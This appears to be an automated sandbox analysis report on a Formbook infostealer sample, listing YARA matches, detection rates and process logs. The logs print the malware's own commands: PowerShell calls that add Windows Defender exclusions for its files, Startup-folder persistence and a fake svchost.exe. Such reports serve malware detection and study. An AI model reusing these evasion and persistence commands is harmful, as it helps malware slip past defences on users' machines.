                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                .NET source code contains very large array initializationsShow sources
                Source: RYhdmjjr94.exe, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 36C95A71.exe.0.dr, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: svchost.exe.0.dr, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/EC49F72F.csLarge array initialization: System.UInt32[] CBBBDD7A.EC49F72F::30D15187: array initializer size 116380
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: RYhdmjjr94.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                Source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.PythonTools.IronPython.dllz- vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_compiler.exeT vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs RYhdmjjr94.exe
                Source: RYhdmjjr94.exeStatic PE information: invalid certificate
                Source: RYhdmjjr94.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@122/68@0/2
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                Source: RYhdmjjr94.exeVirustotal: Detection: 45%
                Source: RYhdmjjr94.exeMetadefender: Detection: 22%
                Source: RYhdmjjr94.exeReversingLabs: Detection: 51%
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile read: C:\Users\user\Desktop\RYhdmjjr94.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\RYhdmjjr94.exe 'C:\Users\user\Desktop\RYhdmjjr94.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: unknownProcess created: C:\Users\Public\Documents\2FDD6624\svchost.exe 'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\2FDD6624\svchost.exe 'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
